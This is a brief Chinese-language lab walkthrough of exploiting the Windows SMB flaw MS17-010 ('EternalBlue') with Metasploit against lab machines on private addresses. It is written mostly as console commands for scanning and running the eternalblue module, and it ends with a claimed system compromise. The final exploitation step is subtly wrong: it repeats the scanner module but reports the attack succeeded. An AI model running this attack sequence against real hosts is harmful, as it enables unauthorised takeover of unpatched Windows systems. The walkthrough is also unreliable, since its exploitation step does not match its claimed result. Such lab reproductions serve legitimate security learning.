介绍:
永恒之蓝是指黑客团体Shadow Brokers公布的大批网络攻击工具,其中就包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞来获取系统最高权限。
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,就可以进行非法操作。
准备
1.kali的ip:192.168.0.128
2.WindowsServer2003的ip:192.168.0.200
3.测试连通性:
开始复现
1.kali进入msf。 命令:msfconsole
2.search ms17-010 #搜索ms17010
- use auxiliary/scanner/smb/smb_ms17_010 #使用模块
- show options #显示选项
- set RHOSTS 192.168.0.200 # 设置目标主机
- 输入run或者exploit执行
- 发现存在漏洞
3.通过使用exploit/windows/smb/ms17_010_eternalblue模块进行漏洞攻击
- use exploit/windows/smb/ms17_010_eternalblue
- set rhosts 192.168.0.200 #设置被攻击端IP
- run #执行
发现这个exp只能对64位的系统执行攻击。惨兮兮!!
哎,重来吧。
win7ip:192.168.0.129
测试连通也没问题
正式开始利用
- use auxiliary/scanner/smb/smb_ms17_010 # 使用模块
set rhosts 192.168.0.129 #设置目标IP
run
发现存在漏洞。
2.漏洞利用
- use auxiliary/scanner/smb/smb_ms17_010
- set rhosts 192.168.0.129
- run
发现攻击成功。
然后就可以为所欲为了。
发现有乱码,可以使用chcp 65001命令消除乱码。
至此复现结束。